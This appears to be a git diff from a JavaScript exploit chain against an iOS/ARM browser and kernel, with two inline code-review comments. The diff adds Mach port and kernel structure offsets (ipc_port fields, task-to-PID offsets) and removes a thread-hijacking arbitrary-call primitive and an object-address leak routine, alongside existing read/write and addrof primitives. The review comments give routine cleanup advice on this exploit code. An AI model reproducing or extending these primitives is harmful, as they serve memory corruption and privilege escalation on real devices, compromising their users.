| -rw-r--r-- | src/js/main.js | 36 | ||||
| -rw-r--r-- | src/js/primitives/call.js | 94 | ||||
| -rw-r--r-- | src/js/primitives/mem.js | 3 |
3 files changed, 36 insertions, 97 deletions
diff --git a/src/js/main.js b/src/js/main.js
index e077fbe..ec7e814 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -18,6 +18,9 @@ var PROT_EXEC = 0x4;
 var MAP_PRIVATE = 0x2;
 var MAP_ANON = 0x1000;
+var RTLD_NOW = 2;
+var PAGE_SIZE = 0x1000;
+var O_RDONLY = 0;
 var victim = {a: 13.37};
@@ -33,7 +36,7 @@ if (0) {
 */
 puts = function (){};
-}
+ }
 }
 var JSStringCreateWithUTF8CString = 0x239f9d0d;
@@ -47,6 +50,35 @@ var kCFPreferencesCurrentHost;
 var kIOMasterPortDefault = NULL;
 var options = {};
+var sanity_port = 0;
+var MACH_PORT_RIGHT_RECEIVE = 0x1;
+var MACH_MSG_TYPE_MAKE_SEND = 0x14;
+var MACH_PORT_LIMITS_INFO = 0x1;
+var MACH_PORT_LIMITS_INFO_COUNT = 0x1;
+var kport_size = 0x78;
+var kport_ip_bits4 = 0x0;
+var kport_ip_references4 = 0x4;
+var kport_ip_lock_type4 = 0x10;
+var kport_ip_messages_port_qlimit2 = 0x42;
+var kport_ip_receiver4 = 0x4c;
+var kport_ip_srights4 = 0x70;
+var KERN_SUCCESS = 0;
+var NULL = 0;
+var MACH_PORT_NULL = 0;
+var req_init_port_set = 0x1c;
+var req_head_msgh_bits = 0x0;
+var req_head_msgh_request_port = 0x8;
+var req_head_msgh_reply_port = 0xc;
+var req_head_msgh_id = 0x14;
+var req_msgh_body_msgh_descriptor_count = 0x18;
+var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
+var req_init_port_set_address = 0x0;
+var req_init_port_set_count = 0x4;
+var MACH_RCV_MSG = 0x2;
+var MACH_MSG_TIMEOUT_NONE = 0;
+var TASK_BSDINFO_OFFSET = 0x200;
+var BSDINFO_PID_OFFSET = 0x8;
 function parse_nvram_options() {
 // read_u32(dlsym(dlopen("/System/Library/Frameworks/IOKit.framework/IOKit", RTLD_NOW), "kIOMasterPortDefault"));
 var kIOMasterPortDefault_ptr = shit_heap(4)
@@ -98,7 +130,7 @@ function main() {
 sym_cache["JSObjectGetProperty"] = JSObjectGetProperty + dyld_shc_slide;
 sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
- prep_shit();
+// prep_shit();
 setup_fancy_rw();
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index a581c91..74a20d8 100644
--- a/src/js/primitives/call.js 
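Review bot: `var NULL = 0;` is added below the context line `var kIOMasterPortDefault = NULL;`, and within this script the declaration is hoisted but the assignment is not, so unless NULL is already set by an earlier-loaded script or above line 47, kIOMasterPortDefault is initialised to undefined rather than 0. Move `var NULL = 0;` and `var MACH_PORT_NULL = 0;` above the kIOMasterPortDefault line, or drop the redeclaration if NULL already exists elsewhere. The kport_size, kport_ip_*, TASK_BSDINFO_OFFSET and BSDINFO_PID_OFFSET values are kernel structure offsets with no indication of which build they were taken from; a header comment such as `// ipc_port / task layout offsets: valid only for the targeted kernel build, re-derive before reuse` would stop them being applied to a different kernel without checking.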
+++ b/src/js/primitives/call.js 
@@ -158,100 +158,6 @@ function symaddr(sym) {
 return addy;
 }
-function callnarg_new() {
- if (arguments.length < 1) {
- return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
- }
-
- var stack_shit = 0x161000;
-
- /*
- * setup ptrs
- */
- write_u32(countptr, count);
- write_u32(thptr, th);
- write_u32(threadptr, thread);
- write_u32(thread_stateptr, thread_state);
-
- write_u32(countptrptr, countptr);
- write_u32(thptrptr, thptr);
- write_u32(threadptrptr, threadptr);
- write_u32(thread_stateptrptr, thread_stateptr);
-
- var addy = arguments[0];
- var dyld_shc_slide = get_dyld_shc_slide();
-
- /*
- * make __stack_chk_fail infinite loop
- * (works by setting its lazy addy to its resolver, thus the resolver just
- * endlessly jumps to iself)
- */
- write_u32(__stack_chk_fail_lazy_addy + dyld_shc_slide, __stack_chk_fail_resolver + dyld_shc_slide);
-
- /*
- * if the thread doesn't exist, create it.
- */
- calls4arg("pthread_create", threadptr, 0, __stack_chk_fail_resolver + dyld_shc_slide, 0);
- thread = read_u32(threadptr);
- write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
- rth = read_u32(th);
- calls4arg("thread_suspend", rth, 0, 0, 0);
-
- if (pthread_ret == 0) {
- pthread_ret = malloc(4);
- }
-
- /*
- * write first 4 to r0-r3, rest to stack
- */
- for (var i = 1; i < arguments.length; i++) {
- if (i <= 4) {
- write_u32(thread_state + ((i - 1) << 2), arguments[i]);
- } else {
- write_u32(stack_shit + ((i - 5) << 2), arguments[i]);
- }
- }
-
- var stack_shit_ret_offset = 0x58;
-
- write_u32(stack_shit + stack_shit_ret_offset, pthread_exit + dyld_shc_slide);
-
- /*
- * stack
- */
- write_u32(thread_state + (13 << 2), stack_shit);
-
- /*
- * return address, infinite loop
- */
- write_u32(thread_state + (14 << 2), add_sp_0x3c + dyld_shc_slide);
-
- /*
- * pc
- */
- write_u32(thread_state + (15 << 2), addy);
-
- /*
- * cpsr, magic
- */
- if (addy & 1) {
- write_u32(thread_state + (16 << 2), 0x40000020);
- } else {
- write_u32(thread_state + (16 << 2), 0x40000000);
- }
-
- /*
- * set the state
- */
- calls4arg("thread_set_state", rth, ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
- calls4arg("thread_resume", rth, 0, 0, 0);
-
- calls4arg("pthread_join", thread, pthread_ret, 0, 0);
- write_u32(count, 17);
- calls4arg("thread_get_state", rth, ARM_THREAD_STATE, thread_state, count);
- return read_u32(pthread_ret);
-}
-
 function callnarg() {
 if (arguments.length < 1) {
 return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index 0c03090..d664e7b 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -308,12 +308,13 @@ var jsobj_addr;
 var large_buf = new Uint32Array(0x100000);
 var large_buf_ptr = 0;
+/*
 function prep_shit() {
 string_ref = scall("JSStringCreateWithUTF8CString", "victim");
 global_object = scall("JSContextGetGlobalObject", read_u32(slid + reserve_addr + 0x44));
 jsobj_addr = scall("JSObjectGetProperty", read_u32(slid + reserve_addr + 0x44), global_object, string_ref, NULL);
 large_buf_ptr = leak_vec(large_buf);
-}
+}*/
 function addrof(obj) {
 victim.target = obj; |
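Review bot: Wrapping prep_shit in `/* ... */` instead of deleting it leaves dead code in mem.js and, unless they are assigned somewhere not shown, leaves its four outputs unset: large_buf_ptr stays 0 and string_ref, global_object and jsobj_addr are never written, so any remaining reader of them (addrof starts directly below and runs past the hunk) now works from a zero or undefined address. Delete the function outright, since git keeps the history, and either remove the variables that depended on it or fail fast at their first use, e.g. `if (large_buf_ptr === 0) throw new Error("large_buf_ptr not initialised");`. The matching `// prep_shit();` in main() is disabled the same way in this commit and should follow the same treatment.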
